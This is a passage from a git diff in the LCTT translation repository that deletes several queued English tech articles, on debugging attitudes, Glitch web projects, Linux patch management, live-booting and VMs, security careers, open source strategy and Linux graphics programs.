day. - -As I mentioned, at the Recurse Center there are no deadlines and no assignments, so this attitude is pretty much free. I’d say, “You get to spend a day chasing down this weird bug in Flask, how exciting!” At Dropbox and later at Pilot, where we have a product to ship, deadlines, and users, I’m not always uniformly delighted about spending a day on a weird bug. So I’m sympathetic to the reality of the world where there are deadlines. However, if I have a bug to fix, I have to fix it, and being grumbly about the existence of the bug isn’t going to help me fix it faster. I think that even in a world where deadlines loom, you can still apply this attitude. - -If you love your bugs, you can have more fun while you’re working on a tough problem. You can be less worried and more focused, and end up learning more from them. Finally, you can share a bug with your friends and colleagues, which helps you and your teammates. - -### Obrigada! - -My thanks to folks who gave me feedback on this talk and otherwise contributed to my being there: - -* Sasha Laundy - -* Amy Hanlon - -* Julia Evans - -* Julian Cooper - -* Raphael Passini Diniz and the rest of the Python Brasil organizing team - --------------------------------------------------------------------------------- - -via: http://akaptur.com/blog/2017/11/12/love-your-bugs/ - -作者:[Allison Kaptur ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://akaptur.com/about/ -[1]:http://2017.pythonbrasil.org.br/# -[2]:http://www.youtube.com/watch?v=h4pZZOmv4Qs -[3]:http://www.pilot.com/ -[4]:http://www.dropbox.com/ -[5]:http://www.recurse.com/ -[6]:http://www.youtube.com/watch?v=ETgNLF_XpEM -[7]:http://akaptur.com/blog/2015/10/10/effective-learning-strategies-for-programmers/ diff --git a/sources/tech/20171113 Glitch write fun small web projects instantly.md b/sources/tech/20171113 Glitch write fun small web projects instantly.md deleted file mode 100644 index 734853ce51..0000000000 --- a/sources/tech/20171113 Glitch write fun small web projects instantly.md +++ /dev/null @@ -1,76 +0,0 @@ -translating---geekpi - -Glitch: write fun small web projects instantly -============================================================ - -I just wrote about Jupyter Notebooks which are a fun interactive way to write Python code. That reminded me I learned about Glitch recently, which I also love!! I built a small app to [turn of twitter retweets][2] with it. So! - -[Glitch][3] is an easy way to make Javascript webapps. (javascript backend, javascript frontend) - -The fun thing about glitch is: - -1. you start typing Javascript code into their web interface - -2. as soon as you type something, it automagically reloads the backend of your website with the new code. You don’t even have to save!! It autosaves. - -So it’s like Heroku, but even more magical!! Coding like this (you type, and the code runs on the public internet immediately) just feels really **fun** to me. - -It’s kind of like sshing into a server and editing PHP/HTML code on your server and having it instantly available, which I kind of also loved. Now we have “better deployment practices” than “just edit the code and it is instantly on the internet” but we are not talking about Serious Development Practices, we are talking about writing tiny programs for fun. - -### glitch has awesome example apps - -Glitch seems like fun nice way to learn programming! - -For example, there’s a space invaders game (code by [Mary Rose Cook][4]) at [https://space-invaders.glitch.me/][5]. The thing I love about this is that in just a few clicks I can - -1. click “remix this” - -2. start editing the code to make the boxes orange instead of black - -3. have my own space invaders game!! Mine is at [http://julias-space-invaders.glitch.me/][1]. (i just made very tiny edits to make it orange, nothing fancy) - -They have tons of example apps that you can start from – for instance [bots][6], [games][7], and more. - -### awesome actually useful app: tweetstorms - -The way I learned about Glitch was from this app which shows you tweetstorms from a given user: [https://tweetstorms.glitch.me/][8]. - -For example, you can see [@sarahmei][9]’s tweetstorms at [https://tweetstorms.glitch.me/sarahmei][10] (she tweets a lot of good tweetstorms!). - -### my glitch app: turn off retweets - -When I learned about Glitch I wanted to turn off retweets for everyone I follow on Twitter (I know you can do it in Tweetdeck!) and doing it manually was a pain – I had to do it one person at a time. So I wrote a tiny Glitch app to do it for me! - -I liked that I didn’t have to set up a local development environment, I could just start typing and go! - -Glitch only supports Javascript and I don’t really know Javascript that well (I think I’ve never written a Node program before), so the code isn’t awesome. But I had a really good time writing it – being able to type and just see my code running instantly was delightful. Here it is: [https://turn-off-retweets.glitch.me/][11]. - -### that’s all! - -Using Glitch feels really fun and democratic. Usually if I want to fork someone’s web project and make changes I wouldn’t do it – I’d have to fork it, figure out hosting, set up a local dev environment or Heroku or whatever, install the dependencies, etc. I think tasks like installing node.js dependencies used to be interesting, like “cool i am learning something new” and now I just find them tedious. - -So I love being able to just click “remix this!” and have my version on the internet instantly. - - --------------------------------------------------------------------------------- - -via: https://jvns.ca/blog/2017/11/13/glitch--write-small-web-projects-easily/ - -作者:[Julia Evans ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://jvns.ca/ -[1]:http://julias-space-invaders.glitch.me/ -[2]:https://turn-off-retweets.glitch.me/ -[3]:https://glitch.com/ -[4]:https://maryrosecook.com/ -[5]:https://space-invaders.glitch.me/ -[6]:https://glitch.com/handy-bots -[7]:https://glitch.com/games -[8]:https://tweetstorms.glitch.me/ -[9]:https://twitter.com/sarahmei -[10]:https://tweetstorms.glitch.me/sarahmei -[11]:https://turn-off-retweets.glitch.me/ diff --git a/sources/tech/20171114 Sysadmin 101 Patch Management.md b/sources/tech/20171114 Sysadmin 101 Patch Management.md deleted file mode 100644 index 55ca09da87..0000000000 --- a/sources/tech/20171114 Sysadmin 101 Patch Management.md +++ /dev/null @@ -1,61 +0,0 @@ -【翻译中 @haoqixu】Sysadmin 101: Patch Management -============================================================ - -* [HOW-TOs][1] - -* [Servers][2] - -* [SysAdmin][3] - - -A few articles ago, I started a Sysadmin 101 series to pass down some fundamental knowledge about systems administration that the current generation of junior sysadmins, DevOps engineers or "full stack" developers might not learn otherwise. I had thought that I was done with the series, but then the WannaCry malware came out and exposed some of the poor patch management practices still in place in Windows networks. I imagine some readers that are still stuck in the Linux versus Windows wars of the 2000s might have even smiled with a sense of superiority when they heard about this outbreak. - -The reason I decided to revive my Sysadmin 101 series so soon is I realized that most Linux system administrators are no different from Windows sysadmins when it comes to patch management. Honestly, in some areas (in particular, uptime pride), some Linux sysadmins are even worse than Windows sysadmins regarding patch management. So in this article, I cover some of the fundamentals of patch management under Linux, including what a good patch management system looks like, the tools you will want to put in place and how the overall patching process should work. - -### What Is Patch Management? - -When I say patch management, I'm referring to the systems you have in place to update software already on a server. I'm not just talking about keeping up with the latest-and-greatest bleeding-edge version of a piece of software. Even more conservative distributions like Debian that stick with a particular version of software for its "stable" release still release frequent updates that patch bugs or security holes. - -Of course, if your organization decided to roll its own version of a particular piece of software, either because developers demanded the latest and greatest, you needed to fork the software to apply a custom change, or you just like giving yourself extra work, you now have a problem. Ideally you have put in a system that automatically packages up the custom version of the software for you in the same continuous integration system you use to build and package any other software, but many sysadmins still rely on the outdated method of packaging the software on their local machine based on (hopefully up to date) documentation on their wiki. In either case, you will need to confirm that your particular version has the security flaw, and if so, make sure that the new patch applies cleanly to your custom version. - -### What Good Patch Management Looks Like - -Patch management starts with knowing that there is a software update to begin with. First, for your core software, you should be subscribed to your Linux distribution's security mailing list, so you're notified immediately when there are security patches. If there you use any software that doesn't come from your distribution, you must find out how to be kept up to date on security patches for that software as well. When new security notifications come in, you should review the details so you understand how severe the security flaw is, whether you are affected and gauge a sense of how urgent the patch is. - -Some organizations have a purely manual patch management system. With such a system, when a security patch comes along, the sysadmin figures out which servers are running the software, generally by relying on memory and by logging in to servers and checking. Then the sysadmin uses the server's built-in package management tool to update the software with the latest from the distribution. Then the sysadmin moves on to the next server, and the next, until all of the servers are patched. - -There are many problems with manual patch management. First is the fact that it makes patching a laborious chore. The more work patching is, the more likely a sysadmin will put it off or skip doing it entirely. The second problem is that manual patch management relies too much on the sysadmin's ability to remember and recall all of the servers he or she is responsible for and keep track of which are patched and which aren't. This makes it easy for servers to be forgotten and sit unpatched. - -The faster and easier patch management is, the more likely you are to do it. You should have a system in place that quickly can tell you which servers are running a particular piece of software at which version. Ideally, that system also can push out updates. Personally, I prefer orchestration tools like MCollective for this task, but Red Hat provides Satellite, and Canonical provides Landscape as central tools that let you view software versions across your fleet of servers and apply patches all from a central place. - -Patching should be fault-tolerant as well. You should be able to patch a service and restart it without any overall down time. The same idea goes for kernel patches that require a reboot. My approach is to divide my servers into different high availability groups so that lb1, app1, rabbitmq1 and db1 would all be in one group, and lb2, app2, rabbitmq2 and db2 are in another. Then, I know I can patch one group at a time without it causing downtime anywhere else. - -So, how fast is fast? Your system should be able to roll out a patch to a minor piece of software that doesn't have an accompanying service (such as bash in the case of the ShellShock vulnerability) within a few minutes to an hour at most. For something like OpenSSL that requires you to restart services, the careful process of patching and restarting services in a fault-tolerant way probably will take more time, but this is where orchestration tools come in handy. I gave examples of how to use MCollective to accomplish this in my recent MCollective articles (see the December 2016 and January 2017 issues), but ideally, you should put a system in place that makes it easy to patch and restart services in a fault-tolerant and automated way. - -When patching requires a reboot, such as in the case of kernel patches, it might take a bit more time, but again, automation and orchestration tools can make this go much faster than you might imagine. I can patch and reboot the servers in an environment in a fault-tolerant way within an hour or two, and it would be much faster than that if I didn't need to wait for clusters to sync back up in between reboots. - -Unfortunately, many sysadmins still hold on to the outdated notion that uptime is a badge of pride—given that serious kernel patches tend to come out at least once a year if not more often, to me, it's proof you don't take security seriously. - -Many organizations also still have that single point of failure server that can never go down, and as a result, it never gets patched or rebooted. If you want to be secure, you need to remove these outdated liabilities and create systems that at least can be rebooted during a late-night maintenance window. - -Ultimately, fast and easy patch management is a sign of a mature and professional sysadmin team. Updating software is something all sysadmins have to do as part of their jobs, and investing time into systems that make that process easy and fast pays dividends far beyond security. For one, it helps identify bad architecture decisions that cause single points of failure. For another, it helps identify stagnant, out-of-date legacy systems in an environment and provides you with an incentive to replace them. Finally, when patching is managed well, it frees up sysadmins' time and turns their attention to the things that truly require their expertise. - -______________________ - -Kyle Rankin is senior security and infrastructure architect, the author of many books including Linux Hardening in Hostile Networks, DevOps Troubleshooting and The Official Ubuntu Server Book, and a columnist for Linux Journal. Follow him @kylerankin - --------------------------------------------------------------------------------- - -via: https://www.linuxjournal.com/content/sysadmin-101-patch-management - -作者:[Kyle Rankin ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linuxjournal.com/users/kyle-rankin -[1]:https://www.linuxjournal.com/tag/how-tos -[2]:https://www.linuxjournal.com/tag/servers -[3]:https://www.linuxjournal.com/tag/sysadmin -[4]:https://www.linuxjournal.com/users/kyle-rankin diff --git a/sources/tech/20171114 Take Linux and Run With It.md b/sources/tech/20171114 Take Linux and Run With It.md deleted file mode 100644 index b7b6cb9663..0000000000 --- a/sources/tech/20171114 Take Linux and Run With It.md +++ /dev/null @@ -1,68 +0,0 @@ -Take Linux and Run With It -============================================================ - -![](https://www.linuxinsider.com/article_images/story_graphics_xlarge/xl-2016-linux-1.jpg) - -![](https://www.linuxinsider.com/images/2015/image-credit-adobe-stock_130x15.gif) - - -"How do you run an operating system?" may seem like a simple question, since most of us are accustomed to turning on our computers and seeing our system spin up. However, this common model is only one way of running an operating system. As one of Linux's greatest strengths is versatility, Linux offers the most methods and environments for running it. - -To unleash the full power of Linux, and maybe even find a use for it you hadn't thought of, consider some less conventional ways of running it -- specifically, ones that don't even require installation on a computer's hard drive. - -### We'll Do It Live! - -Live-booting is a surprisingly useful and popular way to get the full Linux experience on the fly. While hard drives are where OSes reside most of the time, they actually can be installed to most major storage media, including CDs, DVDs and USB flash drives. - -When an OS is installed to some device other than a computer's onboard hard drive and subsequently booted instead of that onboard drive, it's called "live-booting" or running a "live session." - -At boot time, the user simply selects an external storage source for the hardware to look for boot information. If found, the computer follows the external device's boot instructions, essentially ignoring the onboard drive until the next time the user boots normally. Optical media are increasingly rare these days, so by far the most typical form that an external OS-carrying device takes is a USB stick. - -Most mainstream Linux distributions offer a way to run a live session as a way of trying them out. The live session doesn't save any user activity, and the OS resets to the clean default state after every shutdown. - -Live Linux sessions can be used for more than testing a distro, though. One application is for executing system repair for critically malfunctioning onboard (usually also Linux) systems. If an update or configuration made the onboard system unbootable, a full system backup is required, or the hard drive has sustained serious file corruption, the only recourse is to start up a live system and perform maintenance on the onboard drive. - -In these and similar scenarios, the onboard drive cannot be manipulated or corrected while also keeping the system stored on it running, so a live system takes on those burdens instead, leaving all but the problematic files on the onboard drive at rest. - -Live sessions also are perfectly suited for handling sensitive information. If you don't want a computer to retain any trace of the operations executed or information handled on it, especially if you are using hardware you can't vouch for -- like a public library or hotel business center computer -- a live session will provide you all the desktop computing functions to complete your task while retaining no trace of your session once you're finished. This is great for doing online banking or password input that you don't want a computer to remember. - -### Linux Virtually Anywhere - -Another approach for implementing Linux for more on-demand purposes is to run a virtual machine on another host OS. A virtual machine, or VM, is essentially a small computer running inside another computer and contained in a single large file. - -To run a VM, users simply install a hypervisor program (a kind of launcher for the VM), select a downloaded Linux OS image file (usually ending with a ".iso" file extension), and walk through the setup process. - -Most of the settings can be left at their defaults, but the key ones to configure are the amount of RAM and hard drive storage to lease to the VM. Fortunately, since Linux has a light footprint, you don't have to set these very high: 2 GB of RAM and 16 GB of storage should be plenty for the VM while still letting your host OS thrive. - -So what does this offer that a live system doesn't? First, whereas live systems are ephemeral, VMs can retain the data stored on them. This is great if you want to set up your Linux VM for a special use case, like software development or even security. - -When used for development, a Linux VM gives you the solid foundation of Linux's programming language suites and coding tools, and it lets you save your projects right in the VM to keep everything organized. - -If security is your goal, Linux VMs allow you to impose an extra layer between a potential hazard and your system. If you do your browsing from the VM, a malicious program would have to compromise not only your virtual Linux system, but also the hypervisor -- and  _then_ your host OS, a technical feat beyond all but the most skilled and determined adversaries. - -Second, you can start up your VM on demand from your host system, without having to power it down and start it up again as you would have to with a live session. When you need it, you can quickly bring up the VM, and when you're finished, you just shut it down and go back to what you were doing before. - -Your host system continues running normally while the VM is on, so you can attend to tasks simultaneously in each system. - -### Look Ma, No Installation! - -Just as there is no one form that Linux takes, there's also no one way to run it. Hopefully, this brief primer on the kinds of systems you can run has given you some ideas to expand your use models. - -The best part is that if you're not sure how these can help, live booting and virtual machines don't hurt to try!  -![](https://www.ectnews.com/images/end-enn.gif) - --------------------------------------------------------------------------------- - -via: https://www.linuxinsider.com/story/Take-Linux-and-Run-With-It-84951.html - -作者:[ Jonathan Terrasi ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linuxinsider.com/story/Take-Linux-and-Run-With-It-84951.html#searchbyline -[1]:https://www.linuxinsider.com/story/Take-Linux-and-Run-With-It-84951.html# -[2]:https://www.linuxinsider.com/perl/mailit/?id=84951 -[3]:https://www.linuxinsider.com/story/Take-Linux-and-Run-With-It-84951.html -[4]:https://www.linuxinsider.com/story/Take-Linux-and-Run-With-It-84951.html diff --git a/sources/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md b/sources/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md deleted file mode 100644 index a0a6b1ed60..0000000000 --- a/sources/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md +++ /dev/null @@ -1,58 +0,0 @@ -Security Jobs Are Hot: Get Trained and Get Noticed -============================================================ - -![security skills](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/security-skills.png?itok=IrwppCUw "security skills") -The Open Source Jobs Report, from Dice and The Linux Foundation, found that professionals with security experience are in high demand for the future.[Used with permission][1] - -The demand for security professionals is real. On [Dice.com][4], 15 percent of the more than 75K jobs are security positions. “Every year in the U.S., 40,000 jobs for information security analysts go unfilled, and employers are struggling to fill 200,000 other cyber-security related roles, according to cyber security data tool [CyberSeek][5]” ([Forbes][6]). We know that there is a fast-increasing need for security specialists, but that the interest level is low. - -### Security is the place to be - -In my experience, few students coming out of college are interested in roles in security; so many people see security as niche. Entry-level tech pros are interested in business analyst or system analyst roles, because of a belief that if you want to learn and apply core IT concepts, you have to stick to analyst roles or those closer to product development. That’s simply not the case. - -In fact, if you’re interested in getting in front of your business leaders, security is the place to be – as a security professional, you have to understand the business end-to-end; you have to look at the big picture to give your company the advantage. - -### Be fearless - -Analyst and security roles are not all that different. Companies continue to merge engineering and security roles out of necessity. Businesses are moving faster than ever with infrastructure and code being deployed through automation, which increases the importance of security being a part of all tech pros day to day lives. In our [Open Source Jobs Report with The Linux Foundation][7], 42 percent of hiring managers said professionals with security experience are in high demand for the future. - -There has never been a more exciting time to be in security. If you stay up-to-date with tech news, you’ll see that a huge number of stories are related to security – data breaches, system failures and fraud. The security teams are working in ever-changing, fast-paced environments. A real challenge lies is in the proactive side of security, finding, and eliminating vulnerabilities while maintaining or even improving the end-user experience.   - -### Growth is imminent - -Of any aspect of tech, security is the one that will continue to grow with the cloud. Businesses are moving more and more to the cloud and that’s exposing more security vulnerabilities than organizations are used to. As the cloud matures, security becomes increasingly important.            - -Regulations are also growing – Personally Identifiable Information (PII) is getting broader all the time. Many companies are finding that they must invest in security to stay in compliance and avoid being in the headlines. Companies are beginning to budget more and more for security tooling and staffing due to the risk of heavy fines, reputational damage, and, to be honest, executive job security.   - -### Training and support - -Even if you don’t choose a security-specific role, you’re bound to find yourself needing to code securely, and if you don’t have the skills to do that, you’ll start fighting an uphill battle. There are certainly ways to learn on-the-job if your company offers that option, that’s encouraged but I recommend a combination of training, mentorship and constant practice. Without using your security skills, you’ll lose them fast with how quickly the complexity of malicious attacks evolve. - -My recommendation for those seeking security roles is to find the people in your organization that are the strongest in engineering, development, or architecture areas – interface with them and other teams, do hands-on work, and be sure to keep the big-picture in mind. Be an asset to your organization that stands out – someone that can securely code and also consider strategy and overall infrastructure health. - -### The end game - -More and more companies are investing in security and trying to fill open roles in their tech teams. If you’re interested in management, security is the place to be. Executive leadership wants to know that their company is playing by the rules, that their data is secure, and that they’re safe from breaches and loss. - -Security that is implemented wisely and with strategy in mind will get noticed. Security is paramount for executives and consumers alike – I’d encourage anyone interested in security to train up and contribute. - - _[Download ][2]the full 2017 Open Source Jobs Report now._ - --------------------------------------------------------------------------------- - -via: https://www.linux.com/blog/os-jobs-report/2017/11/security-jobs-are-hot-get-trained-and-get-noticed - -作者:[ BEN COLLEN][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linux.com/users/bencollen -[1]:https://www.linux.com/licenses/category/used-permission -[2]:http://bit.ly/2017OSSjobsreport -[3]:https://www.linux.com/files/images/security-skillspng -[4]:http://www.dice.com/ -[5]:http://cyberseek.org/index.html#about -[6]:https://www.forbes.com/sites/jeffkauflin/2017/03/16/the-fast-growing-job-with-a-huge-skills-gap-cyber-security/#292f0a675163 -[7]:http://media.dice.com/report/the-2017-open-source-jobs-report-employers-prioritize-hiring-open-source-professionals-with-latest-skills/ diff --git a/sources/tech/20171115 Why and How to Set an Open Source Strategy.md b/sources/tech/20171115 Why and How to Set an Open Source Strategy.md deleted file mode 100644 index 79ec071b4d..0000000000 --- a/sources/tech/20171115 Why and How to Set an Open Source Strategy.md +++ /dev/null @@ -1,120 +0,0 @@ -Why and How to Set an Open Source Strategy -============================================================ - -![](https://www.linuxfoundation.org/wp-content/uploads/2017/11/open-source-strategy-1024x576.jpg) - -This article explains how to walk through, measure, and define strategies collaboratively in an open source community. - - _“If you don’t know where you are going, you’ll end up someplace else.” _ _—_  Yogi Berra - -Open source projects are generally started as a way to scratch one’s itch — and frankly that’s one of its greatest attributes. Getting code down provides a tangible method to express an idea, showcase a need, and solve a problem. It avoids over thinking and getting a project stuck in analysis-paralysis, letting the project pragmatically solve the problem at hand. - -Next, a project starts to scale up and gets many varied users and contributions, with plenty of opinions along the way. That leads to the next big challenge — how does a project start to build a strategic vision? In this article, I’ll describe how to walk through, measure, and define strategies collaboratively, in a community. - -Strategy may seem like a buzzword of the corporate world rather something that an open source community would embrace, so I suggest stripping away the negative actions that are sometimes associated with this word (e.g., staff reductions, discontinuations, office closures). Strategy done right isn’t a tool to justify unfortunate actions but to help show focus and where each community member can contribute. - -A good application of strategy achieves the following: - -* Why the project exists? - -* What the project looks to achieve? - -* What is the ideal end state for a project is. - -The key to success is answering these questions as simply as possible, with consensus from your community. Let’s look at some ways to do this. - -### Setting a mission and vision - - _“_ _Efforts and courage are not enough without purpose and direction.”_  — John F. Kennedy - -All strategic planning starts off with setting a course for where the project wants to go. The two tools used here are  _Mission_  and  _Vision_ . They are complementary terms, describing both the reason a project exists (mission) and the ideal end state for a project (vision). - -A great way to start this exercise with the intent of driving consensus is by asking each key community member the following questions: - -* What drove you to join and/or contribute the project? - -* How do you define success for your participation? - -In a company, you’d ask your customers these questions usually. But in open source projects, the customers are the project participants — and their time investment is what makes the project a success. - -Driving consensus means capturing the answers to these questions and looking for themes across them. At R Consortium, for example, I created a shared doc for the board to review each member’s answers to the above questions, and followed up with a meeting to review for specific themes that came from those insights. - -Building a mission flows really well from this exercise. The key thing is to keep the wording of your mission short and concise. Open Mainframe Project has done this really well. Here’s their mission: - - _Build community and adoption of Open Source on the mainframe by:_ - -* _Eliminating barriers to Open Source adoption on the mainframe_ - -* _Demonstrating value of the mainframe on technical and business levels_ - -* _Strengthening collaboration points and resources for the community to thrive_ - -At 40 words, it passes the key eye tests of a good mission statement; it’s clear, concise, and demonstrates the useful value the project aims for. - -The next stage is to reflect on the mission statement and ask yourself this question: What is the ideal outcome if the project accomplishes its mission? That can be a tough one to tackle. Open Mainframe Project put together its vision really well: - - _Linux on the Mainframe as the standard for enterprise class systems and applications._ - -You could read that as a [BHAG][1], but it’s really more of a vision, because it describes a future state that is what would be created by the mission being fully accomplished. It also hits the key pieces to an effective vision — it’s only 13 words, inspirational, clear, memorable, and concise. - -Mission and vision add clarity on the who, what, why, and how for your project. But, how do you set a course for getting there? - -### Goals, Objectives, Actions, and Results - - _“I don’t focus on what I’m up against. I focus on my goals and I try to ignore the rest.”_  — Venus Williams - -Looking at a mission and vision can get overwhelming, so breaking them down into smaller chunks can help the project determine how to get started. This also helps prioritize actions, either by importance or by opportunity. Most importantly, this step gives you guidance on what things to focus on for a period of time, and which to put off. - -There are lots of methods of time bound planning, but the method I think works the best for projects is what I’ve dubbed the GOAR method. It’s an acronym that stands for: - -* Goals define what the project is striving for and likely would align and support the mission. Examples might be “Grow a diverse contributor base” or “Become the leading project for X.” Goals are aspirational and set direction. - -* Objectives show how you measure a goal’s completion, and should be clear and measurable. You might also have multiple objectives to measure the completion of a goal. For example, the goal “Grow a diverse contributor base” might have objectives such as “Have X total contributors monthly” and “Have contributors representing Y different organizations.” - -* Actions are what the project plans to do to complete an objective. This is where you get tactical on exactly what needs done. For example, the objective “Have contributors representing Y different organizations” would like have actions of reaching out to interested organizations using the project, having existing contributors mentor new mentors, and providing incentives for first time contributors. - -* Results come along the way, showing progress both positive and negative from the actions. - -You can put these into a table like this: - -| Goals | Objectives | Actions | Results | -|:--|:--|:--|:--| -| Grow a diverse contributor base     | Have X total contributors monthly | Existing contributors mentor new mentors Providing incentives for first time contributors | | -| | Have contributors representing Y different organizations | Reach out to interested organizations using the project | | - - -In large organizations, monthly or quarterly goals and objectives often make sense; however, on open source projects, these time frames are unrealistic. Six- even 12-month tracking allows the project leadership to focus on driving efforts at a high level by nurturing the community along. - -The end result is a rubric that provides clear vision on where the project is going. It also lets community members more easily find ways to contribute. For example, your project may include someone who knows a few organizations using the project — this person could help introduce those developers to the codebase and guide them through their first commit. - -### What happens if the project doesn’t hit the goals? - - _“I have not failed. I’ve just found 10,000 ways that won’t work.”_  — Thomas A. Edison - -Figuring out what is within the capability of an organization — whether Fortune 500 or a small open source project — is hard. And, sometimes the expectations or market conditions change along the way. Does that make the strategy planning process a failure? Absolutely not! - -Instead, you can use this experience as a way to better understand your project’s velocity, its impact, and its community, and perhaps as a way to prioritize what is important and what’s not. - --------------------------------------------------------------------------------- - -via: https://www.linuxfoundation.org/blog/set-open-source-strategy/ - -作者:[ John Mertic][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linuxfoundation.org/author/jmertic/ -[1]:https://en.wikipedia.org/wiki/Big_Hairy_Audacious_Goal -[2]:https://www.linuxfoundation.org/author/jmertic/ -[3]:https://www.linuxfoundation.org/category/blog/ -[4]:https://www.linuxfoundation.org/category/audience/c-level/ -[5]:https://www.linuxfoundation.org/category/audience/developer-influencers/ -[6]:https://www.linuxfoundation.org/category/audience/entrepreneurs/ -[7]:https://www.linuxfoundation.org/category/campaigns/membership/how-to/ -[8]:https://www.linuxfoundation.org/category/campaigns/events-campaigns/linux-foundation/ -[9]:https://www.linuxfoundation.org/category/audience/open-source-developers/ -[10]:https://www.linuxfoundation.org/category/audience/open-source-professionals/ -[11]:https://www.linuxfoundation.org/category/audience/open-source-users/ -[12]:https://www.linuxfoundation.org/category/blog/thought-leadership/ diff --git a/sources/tech/20171116 Unleash Your Creativity – Linux Programs for Drawing and Image Editing.md b/sources/tech/20171116 Unleash Your Creativity – Linux Programs for Drawing and Image Editing.md deleted file mode 100644 index c6c50d9b25..0000000000 --- a/sources/tech/20171116 Unleash Your Creativity – Linux Programs for Drawing and Image Editing.md +++ /dev/null @@ -1,130 +0,0 @@ -### Unleash Your Creativity – Linux Programs for Drawing and Image Editing - - By: [chabowski][1] - -The following article is part of a series of articles that provide tips and tricks for Linux newbies – or Desktop users that are not yet experienced with regard to certain topics. This series intends to complement the special edition #30 “[Getting Started with Linux][2]” based on [openSUSE Leap][3], recently published by the [Linux Magazine,][4] with valuable additional information. - -![](https://www.suse.com/communities/blog/files/2017/11/DougDeMaio-450x450.jpeg) - -This article has been contributed by Douglas DeMaio, openSUSE PR Expert at SUSE. - -Both Mac OS or Window offer several popular programs for graphics editing, vector drawing and creating and manipulating Portable Document Format (PDF). The good news: users familiar with the Adobe Suite can transition with ease to free, open-source programs available on Linux. - -Programs like [GIMP][5], [InkScape][6] and [Okular][7] are cross platform programs that are available by default in Linux/GNU distributions and are persuasive alternatives to expensive Adobe programs like [Photoshop][8], [Illustrator][9] and [Acrobat][10]. - -These creativity programs on Linux distributions are just as powerful as those for macOS or Window. This article will explain some of the differences and how the programs can be used to make your transition to Linux comfortable. - -### Krita - -The KDE desktop environment comes with tons of cool applications. [Krita][11] is a professional open source painting program. It gives users the freedom to create any artistic image they desire. Krita features tools that are much more extensive than the tool sets of most proprietary programs you might be familiar with. From creating textures to comics, Krita is a must have application for Linux users. - -![](https://www.suse.com/communities/blog/files/2017/11/krita-450x267.png) - -### GIMP - -GNU Image Manipulation Program (GIMP) is a cross-platform image editor. Users of Photoshop will find the User Interface of GIMP to be similar to that of Photoshop. The drop down menu offers colors, layers, filters and tools to help the user with editing graphics. Rulers are located both horizontal and vertical and guide can be dragged across the screen to give exact measurements. The drop down menu gives tool options for resizing or cropping photos; adjustments can be made to the color balance, color levels, brightness and contrast as well as hue and saturation. - -![](https://www.suse.com/communities/blog/files/2017/11/gimp-450x281.png) - -There are multiple filters in GIMP to enhance or distort your images. Filters for artistic expression and animation are available and are more powerful tool options than those found in some proprietary applications. Gradients can be applied through additional layers and the Text Tool offers many fonts, which can be altered in shape and size through the Perspective Tool. - -The cloning tool works exactly like those in other graphics editors, so manipulating images is simple and acurrate given the selection of brush sizes to do the job. - -Perhaps one of the best options available with GIMP is that the images can be saved in a variety of formats like .jpg, .png, .pdf, .eps and .svg. These image options provide high-quality images in a small file. - -### InkScape - -Designing vector imagery with InkScape is simple and free. This cross platform allows for the creation of logos and illustrations that are highly scalable. Whether designing cartoons or creating images for branding, InkScape is a powerful application to get the job done. Like GIMP, InkScape lets you save files in various formats and allows for object manipulation like moving, rotating and skewing text and objects. Shape tools are available with InkScape so making stars, hexagons and other elements will meet the needs of your creative mind. - -![](https://www.suse.com/communities/blog/files/2017/11/inkscape-450x273.png) - -InkScape offers a comprehensive tool set, including a drawing tool, a pen tool and the freehand calligraphy tool that allows for object creation with your own personal style. The color selector gives you the choice of RGB, CMYK and RGBA – using specific colors for branding logos, icons and advertisement is definitely convincing. - -Short cut commands are similar to what users experience in Adobe Illustrator. Making layers and grouping or ungrouping the design elements can turn a blank page into a full-fledged image that can be used for designing technical diagrams for presentations, importing images into a multimedia program or for creating web graphics and software design. - -Inkscape can import vector graphics from multiple other programs. It can even import bitmap images. Inkscape is one of those cross platform, open-source programs that allow users to operate across different operating systems, no matter if they work with macOS, Windows or Linux. - -### Okular and LibreOffice - -LibreOffice, which is a free, open-source Office Suite, allows users to collaborate and interact with documents and important files on Linux, but also on macOS and Window. You can also create PDF files via LibreOffice, and LibreOffice Draw lets you view (and edit) PDF files as images. - -![](https://www.suse.com/communities/blog/files/2017/11/draw-450x273.png) - -However, the Portable Document Format (PDF) is quite different on the three Operating Systems. MacOS offers [Preview][12] by default; Windows has [Edge][13]. Of course, also Adobe Reader can be used for both MacOS and Window. With Linux, and especially the desktop selection of KDE, [Okular][14] is the default program for viewing PDF files. - -![](https://www.suse.com/communities/blog/files/2017/11/okular-450x273.png) - -The functionality of Okular supports different types of documents, like PDF, Postscript, [DjVu][15], [CHM][16], [XPS][17], [ePub][18] and others. Yet the universal document viewer also offers some powerful features that make interacting with a document different from other programs on MacOS and Windows. Okular gives selection and search tools that make accessing the text in PDFs fluid for how users interact with documents. Viewing documents with Okular is also accommodating with the magnification tool that allows for a quick look at small text in a document. - -Okular also provides users with the option to configure it to use more memory if the document is too large and freezes the Operating System. This functionality is convenient for users accessing high-quality print documents for example for advertising. - -For those who want to change locked images and documents, it’s rather easy to do so 